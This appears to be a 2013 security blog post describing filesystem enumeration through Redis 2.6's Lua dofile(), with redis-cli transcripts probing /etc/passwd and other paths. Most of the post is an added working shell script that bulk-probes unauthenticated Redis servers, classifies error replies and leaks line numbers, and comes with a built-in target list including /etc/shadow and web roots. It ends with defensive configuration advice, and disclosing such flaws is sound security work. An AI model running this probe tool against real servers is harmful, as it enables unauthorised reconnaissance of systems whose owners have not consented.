Filesystem Enumeration using Redis and Lua
2013-06-18 21:47
661 views
Redis 2.6 was recently released by Antirez at the end of RedisConf.
One of the major features that comes with 2.6 is embedded Lua scripting.
Even though the Lua sandbox within Redis is locked down to the base library and a few others, we have found at least one way to abuse Lua to get some data from outside the sandbox.
The base library includes a function that loads and executes a file from disk: dofile().
Redis scripts are meant to be deterministic, self-contained functions of their arguments with no I/O beyond the key space, so this function has no business being in the sandbox. We have a pending pull request to remove this function.
The errors dofile() raises allow an attacker to determine whether a file or directory exists and, when a file exists but is not valid Lua, the line number and the token on which the parser failed. This might be useful in locating a web root or determining the operating system. Not a significant vulnerability in and of itself, but it gives an attacker information they would not otherwise have.
When a file doesn't exist we get a very obvious "No such file or directory" error:
net read 127.0.0.1:6379 id 1: -ERR Error running script (call to f_b5e5869caf1de9ffa1ae173bf46fef3024d3f987): cannot open /dev/a:No such file or directory
Here is an example of how to do this enumeration from a shell. Three outcomes are distinguishable: the file exists and was read (Lua then fails to parse it; the reported line number is real, since Lua skips a first line beginning with # and counts it), the path is a directory (the read fails with "Is a directory"), and the path does not exist. A file the Redis process cannot open gives a "Permission denied" variant of the "cannot open" error, which still confirms that the path exists.
$ redis-cli -h localhost -p 6379 eval "dofile('/etc/passwd')" 0
(error) ERR Error running script (call to f_afdc51b5f9e34eced5fae459fc1d856af181aaf1): /etc/passwd:2: unexpected symbol near '#'
$ redis-cli -h localhost -p 6379 eval "dofile('/tmp')" 0
(error) ERR Error running script (call to f_70391feea8a62e239b3055c11b7d9d1d8c78db6e): cannot read /tmp:Is a directory
$ redis-cli -h localhost -p 6379 eval "dofile('/doesnotexist')" 0
(error) ERR Error running script (call to f_e84ccf03dc6b3547568096467afa7b3242ed108d): cannot open /doesnotexist: No such file or directory
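Doing this one path at a time by hand gets old quickly. The script below is an added example and is not code from the original post: it drives redis-cli over a list of candidate paths and classifies each reply the same way the three transcripts above are read by eye, plus two cases the post does not show (a path that exists but cannot be opened, reported as "Permission denied", and a file that is valid Lua and simply runs). It assumes redis-cli is on PATH and that the target is an unauthenticated Redis 2.6 build that still exposes dofile(); the built-in path list is a constructed starting point for web-root and OS fingerprinting, not anything taken from the post.

```shell
#!/bin/sh
# Added example, not code from the original post.
# Bulk filesystem probing through Redis EVAL + Lua dofile(), classifying the
# error text the server sends back. Assumptions: redis-cli is on PATH and the
# target is an unauthenticated Redis 2.6 build that still has dofile() in its
# Lua sandbox.

# classify_dofile_reply REPLY
# Maps one redis-cli reply to a path state:
#   missing     no such file or directory
#   directory   path exists and is a directory (reading it fails with EISDIR)
#   unreadable  path exists but fopen() failed, typically "Permission denied"
#   exists      file was opened and read; Lua then failed to parse it
#   executed    no script error at all: the file was valid Lua and ran in Redis
#   error       redis-cli itself failed (unreachable host, missing binary)
classify_dofile_reply() {
    case "$1" in
        *"Could not connect"*|*"Connection refused"*|*"command not found"*) echo error ;;
        *"No such file or directory"*) echo missing ;;
        *"Is a directory"*)            echo directory ;;
        *"cannot open "*)              echo unreadable ;;
        *"Error running script"*)      echo exists ;;
        *)                             echo executed ;;
    esac
}

# parse_error_line REPLY
# Lua formats syntax errors as "chunkname:LINE: message near 'token'"; pull
# out LINE. Empty output means the reply was not a parse error.
parse_error_line() {
    printf '%s\n' "$1" | sed -n 's/^.*:\([0-9][0-9]*\): .*$/\1/p'
}

# probe_path HOST PORT PATH
# Runs dofile() on PATH inside the server and prints "PATH<TAB>state[<TAB>line N]".
# PATH is embedded in a single-quoted Lua string, so it must not contain a
# single quote or a backslash.
probe_path() {
    reply=$(redis-cli -h "$1" -p "$2" eval "dofile('$3')" 0 2>&1)
    state=$(classify_dofile_reply "$reply")
    line=$(parse_error_line "$reply")
    printf '%s\t%s\t%s\n' "$3" "$state" "${line:+line $line}"
}

# Constructed starting list: common web roots and OS release markers.
default_paths() {
    cat <<'EOF'
/etc/passwd
/etc/shadow
/etc/redhat-release
/etc/debian_version
/etc/lsb-release
/System/Library/CoreServices/SystemVersion.plist
/var/www
/var/www/html
/usr/share/nginx/html
/srv/www
/Library/WebServer/Documents
/etc/nginx/nginx.conf
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
EOF
}

# Usage: sh redis_dofile_probe.sh HOST PORT [WORDLIST]
# The loop only runs when arguments are given, so the functions above can be
# sourced or tested on their own without a live server.
if [ "$#" -ge 2 ]; then
    if [ -n "${3-}" ]; then paths=$(cat "$3"); else paths=$(default_paths); fi
    printf '%s\n' "$paths" | while IFS= read -r p; do
        [ -n "$p" ] && probe_path "$1" "$2" "$p"
    done
fi
```

Run it as sh redis_dofile_probe.sh 127.0.0.1 6379 against a lab instance; feed a larger wordlist as the third argument once the OS is known. The "line N" column is the small content leak mentioned above: a parse error at line 2 tells you the first line of that file begins with #.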
Conclusion for penetration testers:
Keep an eye out for Redis servers on the network during your assessments. An unauthenticated Redis that answers EVAL is at minimum a filesystem oracle, and it usually sits next to the application that trusts it.
Conclusion for everyone else:
Keep your Redis server off the Internet by setting "bind 127.0.0.1" in the redis.conf file. If other hosts must reach it, also set "requirepass" to a strong password, and if your application does not use scripting, disable EVAL with "rename-command EVAL """. Check from outside the host with redis-cli -h <your-public-ip> ping: a PONG without authenticating means the server is exposed.